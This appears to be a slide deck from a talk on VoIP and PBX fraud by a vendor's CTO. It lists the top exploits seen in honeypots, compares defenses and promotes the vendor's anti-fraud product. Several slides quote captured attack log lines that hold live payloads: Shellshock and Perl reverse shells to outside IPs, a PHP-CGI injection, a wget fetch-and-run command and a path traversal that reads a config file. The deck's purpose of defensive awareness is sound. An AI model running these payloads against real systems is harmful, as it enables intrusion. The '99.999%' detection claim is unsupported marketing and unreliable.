The document discusses the issue of fraud in VoIP systems, outlining the methods utilized by hackers to exploit vulnerabilities in PBX systems and the financial impact of such fraud. It evaluates existing defense strategies and their effectiveness, emphasizing the importance of anti-fraud systems that can detect and prevent a majority of attacks. The document concludes with recommendations for improving security measures in VoIP infrastructures.

1. No More Fraud!
Let’s say “enough is enough”

2. About me
Flavio E. Goncalves
CTO of SipPulse
Turnkey solutions for VoIP providers and Telcos.
Anti-Fraud Solutions

3. Objectives
1. Demonstrate the relevance of the fraud problem.
2. Using intelligence and grabbing information
3. Debate the options to solve the problem
4. Limitations of current solutions
5. New approaches

4. Part I, Why you should care?
Three Images
1. Bankruptcy
2. Smashing a car in a pole
3. The million dollar bill stroke
4. Business going away
5. 8 billion dollars

5. Intelligence grabbed in Honeypots
Friendly scanner is still responsible for x% of the attacks
Friendly scanner is not the only one
X% of the attacks are not easily detected
New trend in web exploitation
New trend in competition knock down (Simple SIP
Flooding)

6. Part II - How hackers are getting into your PBX
#1 – Sip Brute Force
#2 – Http Exploitation
#3 – Attacks to phones
#4 – Caller ID Spoofing
#5 – Billing/Credit card frauds
Shodan is an amazing tool for hackers.

7. TOP 5 PBX Exploits in September/October
1. Shellshock
2. PHP/LAMP Injection
3. SQL injection in Trixbox
4. Linksys remote code execution
5. FreePBX Remote Code Execution

8. #1 Shellshock
Exploit Date: 09/2014
Specimen:
[26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -
c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
[26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333
0>&1'"

9. #2 SQL injection in Trixbox
Exploit Date: 03/2014
Specimen:
[25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1
HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7
NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"

10. #3 Linksys Remote Code Execution
Exploit Date: 02/2014
Specimen:
[25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"

11. #4 LAMP Attacks
Apache/PHP Remote Exploit
Exploit date 10/2013
Especimen:
POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d
suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d
auto_prepend_file=php://input -d cgi.force_redirect=0 -d
cgi.redirect_status_env=0 -n
[26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/
php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%6
1%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74
%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+
%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72
%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E
%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%
63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0
like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“

12. #5 CallMeNum (Demo)
Exploit date: 03/2012
Specimen:
GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/
n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p); $c=new
IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN->fdopen($c,r); $~-
>fdopen($c,w); $c->write("]QAfH#.Eqncmpn"); system$_ while<>;'

13. Unknown Exploits
Jul/2014
Specimen:
[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
[03/Jul/2014] "GET /fuxkkk.php
[03/Jul/2014] "GET /recordings/theme/alexpass.php

14. Part – III Analyzing Defense Options
#1 Patching Everything and Upgrade frequently
#2 Use a Firewall
#3 Use a Session Border Controller
#4 Use Encryption
#5 Use an Anti-Fraud System

15. #1 Patch Everything, update frequently
Effectiveness: Low
Risk: High
Cost: High
Comments: Very costly, Not effective, new vulnerabilities
appear every month.

16. #2 Use a Firewall or configure properly IP tables
Effectiveness: Medium
Risk: Medium
Cost: Medium
Comments: Absolutely a must do. At least, no Internet
access to SSH, no Internet access to HTTP/HTTPS.
Limitations: No prevention for phones attacks, callerID
spoofing and social engineering.

17. #3 Use a Session Border Controller
Effectiveness: Medium
Risk: Medium
Cost: Very High
Comments: SBCs can protect your whole infrastructure and
it is a single point to protect. Very effective if you have
multiple PBXs/Gateways.
Limitations: No prevention for phones attacks, callerID
spoofing and social engineering.

18. #4 Use encryption
Effectiveness: Medium
Risk: Medium
Cost: High if you intend to do mutual authentication
Comments: Applied to SIP trunks and phones makes
sense.
Limitations: No prevention for phones attacks, callerID
spoofing and social engineering.

19. #5 Use an AntiFraud System
Effectiveness: High
Risk: Very Low
Cost: Medium
Comments: Can detect 99.999% of the attacks, It prevents
against caller ID spoofing, Social Engineering and Phone
Attacks.
Limitations: Firewall restrictions are required to avoid
tampering.

20. Fraud Prevention for the All
www.tfps.co

22. www.tfps.co || tfps.sippulse.com
Collaborative/non-colaborative blacklists
Source IP, Dialed Number, Protocol Signatures
Policies
Hour of the day, Simultaneous Calls, Quota
Mechanism, SIP Redirect over UDP (<2 ms)
How-To Available for FreeSwitch, Asterisk, OpenSIPS, FreePBX

23. Compared to other anti-fraud solutions!
• Pluggable
• No Additional Hardware
• Small traffic to be analyzed
• Small risk, only a few calls can be affected.

24. ANTI-FRAUD, HOW-TO (DEMO)

25. e-mail: flavio@sippulse.com
skype: flaviogoncalves1
THANK YOU!

26. Backup Slides

27. #6 FreePBX 2.x Code Execution
Specimen:
[03/Jul/2014:17:28:41 +0000] "GET
/admin/config.php?display=auth&handler=api&function=system&args=cd%20/t
mp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-
f%20e HTTP/1.1" 404 534 "-" "-"

28. #4 VTIGER Exploit (Lots of variations)
0001189: Vtiger CRM - php inject vulnerability
Specimen
108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_n
ame=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“
93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST
/vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=sav
ewordtemplate HTTP/1.1" 404 537 "-" "-"

29. #4 PHP Code Injection Vulnerability
Specimen:
[03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-
MIO%20-
e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO
%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333
%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-
%3Efdopen(%24c%2Cw)%3B%20%24c-
%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_
%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“
"GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new
IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r);
$~->fdopen($c,w); $c->write("]QAfH#.Eqnunkn"); system$_ while<>;'

30. #9 FreePBX Extension Dump
Exploitation
Specimen:
184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST
/admin/cdr/call-log.
php?handler=cdr&s=&t=&order=calldate&sens=DESC
&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404
484 "-" "-"

31. #6 Freeswitch Attacks
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-
df-df&template=linksys

32. #4 Caller ID Spoofing
1 - Send 1 million calls and cancel
2 - Fake the callerID to a PRN
3 - Wait for the call back.

33. Open Source is a Target!
We are seeing scans for:
Vicidial
Astpp
phpMyAdmin (hot)
Tomcat
Jboss
FreeSwitch

34. First way to protect
1.Make sure your system is protected by a firewall
1. Vulnerability SCAN
2. Apply firewall rules to prevent unauthorized access to the server
3. Use .htaccess and implement dual authentication

35. # 5 SIP Phone Recent Vulnerabilities
Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/
(10)
Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-
2014-3313/ (4.3)
Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-
2014-3312/ (6.9)
Yealink - http://www.cvedetails.com/cve/CVE-2014-3427
Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/